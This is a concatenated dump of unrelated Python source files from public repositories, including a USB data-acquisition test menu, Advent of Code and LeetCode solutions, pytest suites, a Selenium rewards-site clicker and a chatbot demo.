============================================\n","repo_name":"Rajat-Morphle/Code_Templates","sub_path":"TCC_GUI.py","file_name":"TCC_GUI.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38158567564","text":"import time\nimport sys\nimport fcntl\nimport os\nfrom usb_1608FS_Plus import *\n\ndef toContinue():\n answer = input('Continue [yY]? ')\n if (answer == 'y' or answer == 'Y'):\n return True\n else:\n return False\n\ndef main():\n # initalize the class\n try:\n usb1608FS_Plus = usb_1608FS_Plus()\n print(\"USB-1608FS_Plus device found.\")\n except:\n print('No USB-1608FS-Plus device found.')\n return\n\n# print out the calibration tables\n for chan in range(8):\n for gain in range(8):\n print('Calibration Table (Differential): Chan =',chan,' Range = ',gain, \\\n 'Slope = ',format(usb1608FS_Plus.table_AIn[chan][gain].slope,'.5f'),\\\n 'Intercept = ',format(usb1608FS_Plus.table_AIn[chan][gain].intercept,'5f'))\n\n# print last known calibration date:\n mdate = usb1608FS_Plus.CalDate()\n print('\\nMFG Calibration date: ', mdate)\n\n print(\"wMaxPacketSize = \", usb1608FS_Plus.wMaxPacketSize)\n\n while True:\n print(\"\\nUSB-1608FS-Plus Testing\")\n print(\"----------------\")\n print(\"Hit 'b' to blink LED.\")\n print(\"Hit 'c' to test counter. \")\n print(\"Hit 'C' for continous sampling\")\n print(\"Hit 'd' to read/write digital port.\")\n print(\"Hit 'e' to exit.\")\n print(\"Hit 'i' to test analog input. (differential)\")\n print(\"Hit 'I' to test analog input scan.\")\n print(\"Hit 'M' for information.\")\n print(\"Hit 'r' to reset the device.\")\n print(\"Hit 'S' to get status\")\n print(\"Hit 's' to get serial number.\")\n print(\"Hit 't' to test external trigger.\")\n\n ch = input('\\n')\n\n if ch == 'b':\n count = int(input('Enter number of times to blink: '))\n usb1608FS_Plus.BlinkLED(count)\n elif ch == 'c':\n usb1608FS_Plus.ResetCounter()\n usb1608FS_Plus.DTristateW(0xf0)\n print('Connect DIO0 to CTR0')\n usb1608FS_Plus.DLatchW(0x0)\n toContinue()\n for i in range(100):\n usb1608FS_Plus.DLatchW(0x1)\n usb1608FS_Plus.DLatchW(0x0)\n count = usb1608FS_Plus.Counter()\n print(\"Count = \", count, \" Should read 100.\")\n elif ch == 'd':\n print(\"Testing Digital I/O ...\")\n print(\"connect pins DIO[0-3] <--> DIO[4-7]\")\n usb1608FS_Plus.DTristateW(0xf0)\n print(\"Digital Port Tristate Register = \", hex(usb1608FS_Plus.DTristateR()))\n while True:\n value = int(input('Enter a byte number [0-0xf]: '),16) & 0xf\n usb1608FS_Plus.DLatchW(value)\n value2 = usb1608FS_Plus.DLatchR()\n value3 = usb1608FS_Plus.DPort() >> 4\n print(\"The number you entered: \", hex(value3), \" Latched value: \", hex(value2))\n if toContinue() != True:\n break\n elif ch == 'i':\n print('Connect pin 1 <-> pin 21')\n chan = int(input('Select channel [0-7]: '))\n print('\\t\\t1. +/- 10.V')\n print('\\t\\t2. +/- 5.V')\n print('\\t\\t3. +/- 2.5V')\n print('\\t\\t4. +/- 2.0V')\n print('\\t\\t5. +/- 1.25V')\n print('\\t\\t6. +/- 1.0V')\n print('\\t\\t7. +/- 0.625V')\n print('\\t\\t8. +/- 0.3125V')\n gain = int(input('Select gain [1-8]: '))\n if gain == 1:\n gain = usb1608FS_Plus.BP_10_00V\n elif gain == 2:\n gain = usb1608FS_Plus.BP_5_00V\n elif gain == 3:\n gain = usb1608FS_Plus.BP_2_50V\n elif gain == 4:\n gain = usb1608FS_Plus.BP_2_00V\n elif gain == 5:\n gain = usb1608FS_Plus.BP_1_250V\n elif gain == 6:\n gain = usb1608FS.BP_Plus_2_00V\n elif gain == 7:\n gain = usb1608FS_Plus.BP_0_625V\n elif gain == 8:\n gain = usb1608FS_Plus.BP_0_3125V\n usb1608FS_Plus.DTristateW(0xf0)\n for i in range(20):\n usb1608FS_Plus.DPortW(0)\n time.sleep(0.01)\n value = usb1608FS_Plus.AIn(chan, gain)\n print('Channel: ',chan,' value =', hex(value),'\\t',format(usb1608FS_Plus.volts(gain, value),'.3f'),'V')\n usb1608FS_Plus.DPortW(1)\n time.sleep(0.01)\n value = usb1608FS_Plus.AIn(chan, gain)\n print('Channel: ',chan,' value =', hex(value),'\\t',format(usb1608FS_Plus.volts(gain, value),'.3f'),'V')\n elif ch == 'I':\n print('Testing Analog input scan')\n frequency = float(input('Enter desired frequency [Hz]: '))\n count = int(input('Enter number of scans [1-1024]: '))\n nchan = int(input('Enter number of channels [1-8]: '))\n print(\"\\t\\t1. +/- 10.0V\")\n print(\"\\t\\t2. +/- 5.0V\")\n print(\"\\t\\t3. +/- 2.5V\")\n print(\"\\t\\t4. +/- 2.V\")\n print(\"\\t\\t5. +/- 1.25V\")\n print(\"\\t\\t6. +/- 1.0V\")\n print(\"\\t\\t7. +/- 0.625V\")\n print(\"\\t\\t8. +/- 0.3125V\")\n gain = int(input(\"Select gain [1-8]: \"))\n if gain == 1:\n gain = usb1608FS_Plus.BP_10_00V\n elif gain == 2:\n gain = usb1608FS_Plus.BP_5_00V\n elif gain == 3:\n gain = usb1608FS_Plus.BP_2_50V\n elif gain == 4:\n gain = usb1608FS_Plus.BP_2_00V\n elif gain == 5:\n gain = usb1608FS_Plus.BP_1_25V\n elif gain == 6:\n gain = usb1608FS_Plus.BP_1_00V\n elif gain == 7:\n gain = usb1608FS_Plus.BP_0_625V\n elif gain == 8:\n gain = usb1608FS_Plus.BP_0_3125V\n gains = [0]*8\n channels = 0\n for chan in range(nchan):\n gains[chan] = gain\n channels |= (0x1 << chan)\n usb1608FS_Plus.AInConfigW(gains)\n\n if frequency < 100:\n options = usb1608FS_Plus.IMMEDIATE_TRANSFER_MODE\n else:\n options = usb1608FS_Plus.BLOCK_TRANSFER_MODE\n\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n \n usb1608FS_Plus.AInScanStart(count, frequency, channels, options)\n dataAIn = usb1608FS_Plus.AInScanRead(count)\n for scan in range(count):\n for channel in range(nchan):\n ii = scan*nchan + channel\n dataAIn[ii] = round(dataAIn[ii]*usb1608FS_Plus.table_AIn[channel][gain].slope + usb1608FS_Plus.table_AIn[channel][gain].intercept)\n print(\"Channel {0:d} Sample[{1:d}] = \".format(channel, ii), hex(dataAIn[ii]),\" Volts = {0:7.4f}\".format(usb1608FS_Plus.volts(gain,dataAIn[ii])))\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n elif ch == 'C':\n print('Testing USB-1608FS-Plus Analog Input Scan in Continuous mode')\n nchan = int(input('Enter number of channels [1-8]: '))\n frequency = float(input('Enter sampling frequency [Hz]: '))\n print('Hit any key to exit')\n if frequency < 100:\n options = usb1608FS_Plus.IMMEDIATE_TRANSFER_MODE\n else:\n options = 0x0\n channels = 0\n for i in range(nchan):\n channels |= (0x1 << i)\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n usb1608FS_Plus.AInScanStart(0, frequency, channels, options)\n flag = fcntl.fcntl(sys.stdin, fcntl.F_GETFL)\n fcntl.fcntl(sys.stdin, fcntl.F_SETFL, flag|os.O_NONBLOCK)\n j = 0\n while True:\n raw_data = usb1608FS_Plus.AInScanRead(128)\n print('Scan =', j, 'samples returned =', len(raw_data))\n j += 1\n c = sys.stdin.readlines()\n if (len(c) != 0):\n break\n fcntl.fcntl(sys.stdin, fcntl.F_SETFL, flag)\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n elif ch == 'M':\n print(\"Manufacturer: %s\" % usb1608FS_Plus.getManufacturer())\n print(\"Product: %s\" % usb1608FS_Plus.getProduct())\n print(\"Serial No: %s\" % usb1608FS_Plus.getSerialNumber())\n elif ch == 'e':\n usb1608FS_Plus.udev.close()\n exit(0)\n elif ch == 'r':\n usb1608FS_Plus.Reset()\n elif ch == 'S':\n print(hex(usb1608FS_Plus.Status()))\n usb1608FS_Plus.printStatus()\n elif ch == 's':\n print(\"Serial No: %s\" % usb1608FS_Plus.getSerialNumber())\n elif ch == 't':\n print(\"Connect Pin 37 TRIG_IN to Pin 21 DIO0\")\n print(\"Trigger set to falling edge\")\n print(\"Sample 8 channels, 625 scans, 25000 Hz, +/- 2V\")\n usb1608FS_Plus.DTristateW(0x0) # set all pins to output\n counter = 0\n frequency = 25000\n count = 625\n nChan = 8\n channels = 0\n gain = usb1608FS_Plus.BP_2_00V\n gains = [0]*8\n for chan in range(nChan):\n gains[chan] = gain\n channels |= (0x1 << chan)\n usb1608FS_Plus.AInConfigW(gains) \n options = usb1608FS_Plus.BLOCK_TRANSFER_MODE | usb1608FS_Plus.TRIG_EDGE_FALLING\n usb1608FS_Plus.AInScanStart(count, frequency, channels, options)\n while(True): # loop forever\n time.sleep(1)\n usb1608FS_Plus.DLatchW(0x0)\n usb1608FS_Plus.DLatchW(0x1)\n usb1608FS_Plus.DLatchW(0x0)\n \n data = usb1608FS_Plus.AInScanRead(count)\n counter = counter + 1\n print('counter =', counter, 'data length is', len(data),' Expected ', count*(nChan))\n# for i in range(count*nChan):\n# print('data[',i,'] = ', hex(data[i]),'\\t',format(usb1608FS.volts(gain, data[i]),'.3f'),'V')\n# usb1608FS.AInStop()\n usb1608FS_Plus.AInScanStart(count, frequency, channels, options) # reset the scan\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wjasper/Linux_Drivers","sub_path":"USB/python/test-usb1608FS-Plus.py","file_name":"test-usb1608FS-Plus.py","file_ext":"py","file_size_in_byte":8956,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"18"} +{"seq_id":"35877687048","text":"# class Anton:\n# location = \"Новосибирск\"\n# def __init__(self, rost=56, ves=135):\n# self.height = rost\n# self.wright = ves\n# self.otkuda = Anton.location\n#\n# def __private(self):\n# pass\n#\n# def __private(self):\n# pass\n#\n# chelovek = Anton(10)\n# chelovek2 = Anton(57)\n# print(chelovek.height)\n\nclass Human:\n default_name = \"House\"\n\n def __init__(self,default_name, default_age):\n self.name = default_name\n self.age = default_age\n self.__money = 1\n self.__house= None\n\n def __make_deal(self,dom):\n if self.__money >= dom.final_price():\n self.__money -= dom.final_price()\n return True\n else:\n return False\n\n def buy_house(self, dom):\n if self.__make_deal(dom):\n dom.owner= self.name\n self.__house = dom\n return \"купил \"\n\nclass House():\n def __init__(self):\n self.__price = 5000\n\n def final_price(self):\n return self.__price - 500\n\n\nartem = Human(\"Глеб\", 5)\ndom1 = House()\n\nprint(artem.buy_house(dom1))\n\n","repo_name":"UWUreUWU/python","sub_path":"25/mimi.py","file_name":"mimi.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9450295839","text":"import os\nimport math\nfrom datetime import date\n\ndef writeData(endTime):\n\n fileName = \"userdata.txt\"\n file = open(fileName, \"a\")\n filesize = os.path.getsize(fileName)\n todaysDate = date.today().strftime('%Y-%m-%d')\n toWrite = \"\"\n\n if filesize != 0:\n toWrite = \"#\" + toWrite\n\n toWrite = toWrite + todaysDate + \"+\" + endTime\n print(\"Writing Data: \", toWrite + \"\\n\")\n file.write(toWrite)\n file.close()\n\ndef calcSeconds(input):\n array = input.split(\":\")\n seconds = int(array[1]) + 60*int(array[0])\n return seconds\n\ndef convertSecsToString(input):\n mins = math.floor(input/60)\n secs = math.floor(input % 60)\n ret = '{:02d}:{:02d}'.format(mins, secs)\n return ret\n\ndef getLargest():\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")\n\n largestInt = -1\n largestString = \"\"\n\n for entry in array:\n array = entry.split(\"+\")\n secs = calcSeconds(array[1])\n if (secs > largestInt):\n largestInt = secs\n largestString = entry\n\n file.close()\n largestArray = largestString.split(\"+\")\n return \"Worst time - \" + largestArray[1] + \" (\" + largestArray[0] + \")\"\n\ndef getFastest():\n\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")\n\n smallestInt = 9999999999999\n smallestString = \"\"\n\n for entry in array:\n array = entry.split(\"+\")\n secs = calcSeconds(array[1])\n if (secs < smallestInt):\n smallestInt = secs\n smallestString = entry\n\n file.close()\n smallestArray = smallestString.split(\"+\")\n return \"Best time - \" + smallestArray[1] + \" (\" + smallestArray[0] + \")\"\n\ndef getAverage():\n\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")\n\n avgInt = 0\n i = 0\n for entry in array:\n array = entry.split(\"+\")\n secs = calcSeconds(array[1])\n avgInt = avgInt + secs\n i = i + 1\n \n avgInt = avgInt/i\n \n ret = convertSecsToString(avgInt)\n\n file.close()\n return \"Average poo - \" + ret\n\ndef getFirst():\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")[0].split(\"+\")\n return \"First poop - \" + array[1] + \" (\" + array[0] + \")\"\n\n# Writes data\n# Returns Difference from last poo\ndef stop(endTime):\n\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n \n if (filesize==0):\n writeData(endTime)\n return \"This was your first poo!\"\n\n writeData(endTime)\n file = open(fileName, \"r\")\n stringArray = file.read().split(\"#\")\n file.close()\n previousSeconds = calcSeconds(stringArray[-2].split(\"+\")[1])\n currentSeconds = calcSeconds(stringArray[-1].split(\"+\")[1])\n\n # scored a worse time\n if (currentSeconds > previousSeconds):\n difference = currentSeconds - previousSeconds\n ret = convertSecsToString(difference)\n return \"Slower than last time by \" + ret + \" :(\"\n\n # scored a better time\n if (currentSeconds < previousSeconds):\n difference = previousSeconds - currentSeconds\n ret = convertSecsToString(difference)\n return \"Faster than last time by \" + ret + \" :)\"\n\n if (currentSeconds == previousSeconds):\n return \"Same speed as last time.\"\n\n\n","repo_name":"kkd16/PitStop","sub_path":"timeFunctions.py","file_name":"timeFunctions.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71427127080","text":"import os\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport time\n\nimport datetime as dt\n\n\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.neural_network import MLPRegressor\n\n\n\nimport warnings\n\nwarnings.simplefilter('ignore')\nFOLDER = '../input/'\n\nOUTPUT = '../preprocessed/'\n\nos.listdir(FOLDER)\ndf_structures = pd.read_csv(os.path.join(FOLDER, 'structures.csv'))\n\ndf_distance = df_structures.merge(df_structures, how = 'left', on= 'molecule_name', suffixes = ('_0', '_1'))\n\n# remove same molecule\n\ndf_distance = df_distance.loc[df_distance['atom_index_0'] != df_distance['atom_index_1']]\n\ndf_distance['distance'] = np.linalg.norm(df_distance[['x_0','y_0', 'z_0']].values - \n\n df_distance[['x_1', 'y_1', 'z_1']].values, axis=1, ord = 2)\n\ndf_distance.head(10)\ndef get_interaction_data_frame(df_distance, num_nearest = 5):\n\n time_start = dt.datetime.now()\n\n print(\"START\", time_start)\n\n \n\n # get nearest 5 (num_nearest) by distances\n\n df_temp = df_distance.groupby(['molecule_name', 'atom_index_0', 'atom_1'])['distance'].nsmallest(num_nearest)\n\n \n\n # make it clean\n\n df_temp = pd.DataFrame(df_temp).reset_index()[['molecule_name', 'atom_index_0', 'atom_1', 'distance']]\n\n df_temp.columns = ['molecule_name', 'atom_index', 'atom', 'distance']\n\n \n\n time_nearest = dt.datetime.now()\n\n print(\"Time Nearest\", time_nearest-time_start)\n\n \n\n # get rank by distance\n\n df_temp['distance_rank'] = df_temp.groupby(['molecule_name', 'atom_index', 'atom'])['distance'].rank(ascending = True, method = 'first').astype(int)\n\n \n\n time_rank = dt.datetime.now()\n\n print(\"Time Rank\", time_rank-time_nearest)\n\n \n\n # pivot to get nearest distance by atom type \n\n df_distance_nearest = pd.pivot_table(df_temp, index = ['molecule_name','atom_index'], columns= ['atom', 'distance_rank'], values= 'distance')\n\n \n\n time_pivot = dt.datetime.now()\n\n print(\"Time Pivot\", time_pivot-time_rank)\n\n del df_temp\n\n \n\n columns_distance_nearest = np.core.defchararray.add('distance_nearest_', \n\n np.array(df_distance_nearest.columns.get_level_values('distance_rank')).astype(str) + \n\n np.array(df_distance_nearest.columns.get_level_values('atom')) )\n\n df_distance_nearest.columns = columns_distance_nearest\n\n \n\n # 1 / r^2 to get the square inverse same with the previous kernel\n\n df_distance_sq_inv_farthest = 1 / (df_distance_nearest ** 2)\n\n \n\n columns_distance_sq_inv_farthest = [col.replace('distance_nearest', 'distance_sq_inv_farthest') for col in columns_distance_nearest]\n\n\n\n df_distance_sq_inv_farthest.columns = columns_distance_sq_inv_farthest\n\n time_inverse = dt.datetime.now()\n\n print(\"Time Inverse Calculation\", time_inverse-time_pivot)\n\n \n\n df_interaction = pd.concat([df_distance_sq_inv_farthest, df_distance_nearest] , axis = 1)\n\n df_interaction.reset_index(inplace = True)\n\n \n\n time_concat = dt.datetime.now()\n\n print(\"Time Concat\", time_concat-time_inverse)\n\n \n\n return df_interaction\nfirst_100_molecules = df_structures['molecule_name'].unique()[:100]\n\ndf_interaction = get_interaction_data_frame(df_distance.loc[df_distance['molecule_name'].isin(first_100_molecules)])\ndf_interaction.head(20)","repo_name":"aorursy/new-nb-3","sub_path":"hervind_speed-up-coulomb-interaction-56x-faster.py","file_name":"hervind_speed-up-coulomb-interaction-56x-faster.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74665631720","text":"from friendsecure.node import Node\nfrom mock import MagicMock\nimport json\n\n\ndef test_message_received():\n class Screen(object):\n def __init__(self):\n self.addLine = MagicMock()\n\n screen = Screen()\n\n class Peer(object):\n def __init__(self, host='127.0.0.1', port=8888):\n self.host = host\n self.port = port\n\n protocol = MagicMock()\n protocol.transport = MagicMock()\n protocol.transport.getPeer = MagicMock(return_value=Peer())\n\n nod = Node('public_key', 'private_key', screen)\n host = '127.0.0.1'\n port = 8888\n nod._contacts[(host, port)] = protocol\n\n msg = {\n 'type': 'message',\n 'message': 'hello'\n }\n nod.message_received(msg, protocol)\n assert 1 == nod._screen.addLine.call_count\n assert '[THEM] hello\\n' == nod._screen.addLine.call_args[0][0]\n\n\ndef test_send_message():\n nod = Node('public_key', 'private_key', MagicMock())\n host = '127.0.0.1'\n port = 8888\n protocol = MagicMock()\n nod._contacts[(host, port)] = protocol\n msg = {\n 'type': 'message',\n 'message': 'hello'\n }\n nod.send_message(host, port, msg)\n assert 1 == protocol.sendMessage.call_count\n assert msg == protocol.sendMessage.call_args[0][0]\n","repo_name":"hpk42/p4p","sub_path":"tests/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"32244234198","text":"import csv\r\nimport shutil\r\nimport os\r\n\r\nfrom click.testing import CliRunner\r\nimport pytest\r\n\r\nfrom trello_cli.cli import create_board, create_card, add_comment, add_label, initialize\r\n\r\nDATA_DIR = \"data\"\r\nAUTH_DIR = \"auth\"\r\nBOARD_ID = \"12345\"\r\nCARD_ID = \"123456\"\r\nLABEL_IDS = [\"4\", \"5\", \"6\", \"7\"]\r\nLIST_IDS = [\"1\", \"2\", \"3\"]\r\nBOARD_CONTENT = \"test_board\"\r\nCARD_CONTENT = \"test_card\"\r\nLABEL_COLORS = [\"yellow\", \"red\", \"blue\", \"green\"]\r\nLIST_CONTENT = \"test_list\"\r\n\r\n\r\n@pytest.fixture(scope=\"session\", autouse=True)\r\ndef resource():\r\n if os.path.isdir(DATA_DIR):\r\n shutil.rmtree(DATA_DIR)\r\n initialize(test=True)\r\n yield\r\n if os.path.isdir(DATA_DIR):\r\n shutil.rmtree(DATA_DIR)\r\n\r\n\r\ndef test_create_board(mock_create_board):\r\n runner = CliRunner()\r\n with mock_create_board(BOARD_ID, BOARD_CONTENT):\r\n result = runner.invoke(create_board, [BOARD_CONTENT])\r\n assert result.exit_code == 0\r\n assert result.output == \"Board successfully created.\\n\"\r\n with open(os.path.join(\"data\", \"board.csv\")) as f:\r\n csv_reader = csv.reader(f, delimiter=\",\")\r\n content = [r for r in csv_reader if r]\r\n assert len(content) == 1\r\n for row in content:\r\n assert row[0] == BOARD_ID\r\n assert row[1] == BOARD_CONTENT\r\n\r\n\r\ndef test_create_card(mock_create_card):\r\n runner = CliRunner()\r\n with mock_create_card(CARD_ID, CARD_CONTENT, BOARD_ID, LIST_IDS):\r\n result = runner.invoke(create_card, [BOARD_CONTENT, \"Done\", CARD_CONTENT])\r\n assert result.exit_code == 0\r\n assert result.output == \"Card successfully created.\\n\"\r\n with open(os.path.join(\"data\", \"card.csv\")) as f:\r\n csv_reader = csv.reader(f, delimiter=\",\")\r\n content = [r for r in csv_reader if r]\r\n assert len(content) == 1\r\n for row in content:\r\n assert row[0] == BOARD_ID\r\n assert row[1] == LIST_IDS[2]\r\n assert row[2] == CARD_ID\r\n assert row[3] == CARD_CONTENT\r\n\r\n\r\ndef test_add_label(mock_add_label):\r\n runner = CliRunner()\r\n with mock_add_label(LABEL_IDS, BOARD_ID, '', LABEL_COLORS, CARD_ID):\r\n result = runner.invoke(add_label, [BOARD_CONTENT, \"Done\", CARD_CONTENT, LABEL_COLORS[0]])\r\n assert result.exit_code == 0\r\n assert result.output == \"Label successfully added.\\n\"\r\n with open(os.path.join(\"data\", \"label.csv\")) as f:\r\n csv_reader = csv.reader(f, delimiter=\",\")\r\n content = [r for r in csv_reader if r]\r\n assert len(content) == len(LABEL_COLORS)\r\n for i, row in enumerate(content):\r\n assert row[0] == LABEL_IDS[i]\r\n assert row[1] == BOARD_ID\r\n assert row[2] == ''\r\n assert row[3] == LABEL_COLORS[i]\r\n\r\n\r\ndef test_add_comment(mock_add_comment):\r\n runner = CliRunner()\r\n with mock_add_comment(CARD_ID):\r\n result = runner.invoke(add_comment, [BOARD_CONTENT, \"Done\", CARD_CONTENT, LABEL_COLORS[0]])\r\n assert result.exit_code == 0\r\n assert result.output == \"Comment successfully added.\\n\"\r\n","repo_name":"erayozer17/trello_tool","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33085372994","text":"import sys\nimport rlogin\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom time import sleep\n\nlogin_url = \"https://ssl.realworld.jp/auth/?site=gendama_jp&rid=&af=&frid=&token=&goto=http%3A%2F%2Fwww.gendama.jp%2Fforest%2F\"\nrloginCls = rlogin.Rlogin(login_url, \"settings\")\ndriver = rloginCls.get_driver_no_ext()\ndriver = rloginCls.login(driver)\n\narticle = driver.find_element_by_tag_name(\"article\")\ndiv_tags = article.find_elements_by_tag_name(\"div\")\nfind = False\nfor tag in div_tags:\n\ttry:\n\t\ta_tags = tag.find_elements_by_tag_name(\"a\")\n\t\tfor a_tag in a_tags:\n\t\t\timg_tags = a_tag.find_elements_by_tag_name(\"img\")\n\t\t\tfor img_tag in img_tags:\n\t\t\t\tsrc = img_tag.get_attribute('src')\n\t\t\t\tif str(src).find('star.gif') > -1:\n\t\t\t\t\tdriver.execute_script(\"arguments[0].click();\", a_tag)\n\t\t\t\t\tfind = True\n\t\t\t\t\tbreak\n\t\t\tif find == True:\n\t\t\t\tbreak\n\t\tif find == True:\n\t\t\tbreak\n\n\texcept NoSuchElementException:\n\t\tcontinue\n\nforest = driver.find_element_by_css_selector(\"div#forestBox\")\nosusume = forest.find_element_by_css_selector(\"div#osusumemori\")\nboxes = osusume.find_elements_by_css_selector(\"div.osusume_box\")\nlinks = []\nfor tag in boxes:\n\ta_tag = tag.find_element_by_tag_name(\"a\")\n\tlinks.append(str(a_tag.get_attribute('href')))\n\nfor link in links:\n\tprint(link)\n\tdriver.get(link)\n\ndriver.quit()","repo_name":"takadev/auto_point","sub_path":"gen_forest.py","file_name":"gen_forest.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17957229775","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : maxArea.py\n# Author: PengLei\n# Date : 2019/4/2\n\n'''给定 n 个非负整数 a1,a2,...,an,每个数代表坐标中的一个点 (i, ai) 。在坐标内画 n 条\n垂直线,垂直线 i 的两个端点分别为 (i, ai) 和 (i, 0)。找出其中的两条线,使得它们与 x 轴共\n同构成的容器可以容纳最多的水。\n说明:你不能倾斜容器,且 n 的值至少为 2。'''\n\nclass Solution:\n # 暴力解法\n def maxArea(height):\n maxA = 0\n for i in range(len(height)):\n for j in range(i+1, len(height)):\n if (j-i)*min(height[i], height[j]) > maxA:\n maxA = (j-i)*min(height[i], height[j])\n # print(maxA)\n return maxA\n\n # 动态规划\n def maxArea1(height):\n maxA = 0\n start = 0\n end = len(height) - 1\n while start < end:\n maxA = max(maxA, min(height[start], height[end]) * (end - start))\n if height[start] < height[end]:\n start += 1\n else:\n end -= 1\n return maxA\n\n\nprint(Solution.maxArea1([1,8,6,2,5,4,8,3,7]))","repo_name":"Dwyanepeng/leetcode","sub_path":"maxArea.py","file_name":"maxArea.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70574507879","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n# Create a chatbot instance\nchatbot = ChatBot('MyChatBot')\n\n# Create and set up a new trainer\ntrainer = ChatterBotCorpusTrainer(chatbot)\n\n# Train the chatbot on English language data\ntrainer.train('chatterbot.corpus.english')\n\n# Chat with the bot\nprint(\"Bot: Hello! How can I help you today?\")\n\nwhile True:\n user_input = input(\"You: \")\n \n if user_input.lower() == 'exit':\n print(\"Bot: Goodbye!\")\n break\n \n response = chatbot.get_response(user_input)\n print(\"Bot:\", response)\n","repo_name":"onakogagase/ForHer","sub_path":"python/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37938627859","text":"with open ('day2_input.txt') as file:\n data = file.read().split(\"\\n\")\n \n #print (data)\n \n # Part 1 Strategy\n # A for Rock, B for Paper, and C for Scissors\n # X for Rock, Y for Paper, and Z for Scissors\n # The score for a single round is the score for the shape you selected\n #(1 for Rock, 2 for Paper, and 3 for Scissors) plus the score for the outcome of the round\n #(0 if you lost, 3 if the round was a draw, and 6 if you won).\n \nstrategy_pt1 = {\n \"A X\":4, \"A Y\":8, \"A Z\":3,\n \"B X\":1, \"B Y\":5, \"B Z\":9,\n \"C X\":7, \"C Y\":2, \"C Z\":6,\n} # create a dictionaty of possbile combinations and scores\n\ntotal_score_pt1=0\n\nfor i in data:\n if i in strategy_pt1: # to handle KeyError \n total_score_pt1+=strategy_pt1[i]\n #print(total_score)\n \nprint ('Answer part1:', total_score_pt1) \n\n# Part 2 strategy:\n# X means you need to lose\n# Y means draw\n# Z means you need to win\n\nstrategy_pt2 = {\n \"A X\":3, \"A Y\":4, \"A Z\":8,\n \"B X\":1, \"B Y\":5, \"B Z\":9,\n \"C X\":2, \"C Y\":6, \"C Z\":7,\n} \n \ntotal_score_pt2=0\n\nfor i in data:\n if i in strategy_pt2: # to handle KeyError \n total_score_pt2+=strategy_pt2[i]\n \nprint ('Answer part2:', total_score_pt2) \n\n ","repo_name":"biljanajelic/advent-of-code-2022","sub_path":"day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42745256976","text":"import jax\nimport jax.numpy as jnp\n\nfrom interp.tools.multivariate_normal import MultivariateNormal\nfrom interp.tools.immutable_dict import assign, assign_f, keep_only_f, operate, operate_f\n\n# %%\n\n\"\"\"\nWe can construct multivariate normal distributions by supplying a mean and a\ncovariance matrix.\n\"\"\"\n\n# %%\n\nx = MultivariateNormal(jnp.array([1, 2.0]), jnp.array([[1, 0.1], [0.1, 3.0]]))\n\nprint(x.mean_as())\nprint(x.covariance_as())\n\n# %%\n\n\"\"\"\nLinear functions can be applied.\n\"\"\"\n\n# %%\n\nmul_3 = x.lin_op(lambda x: x * 3)\n\nprint(mul_3.mean_as())\nprint(mul_3.covariance_as())\n\n# %%\n\nmul_mat = x.lin_op(lambda x: jnp.array([[-1.0, 3.0], [0.01, 0.02]]) @ x)\n\nprint(mul_mat.mean_as())\nprint(mul_mat.covariance_as())\n\n# %%\n\n\"\"\"\nWe can also transform the type and shape of the data.\n\"\"\"\n\n# %%\n\nx_dict = x.lin_op(lambda x: {\"a\": x[0].reshape(1, 1, 1), \"b\": x[1]})\n\nprint(x_dict.mean_as())\nprint(x_dict.covariance_as())\n\n# %%\n\n\"\"\"\nassign is from interp.tools.immutable_dict which contains various functions for\noperating on dictionaries in a more functional way.\n\nThe more functional approach is often nicer for working with multivariate\nnormals which hold various tensors in a dictionary.\n\n(Detail: Also, jax 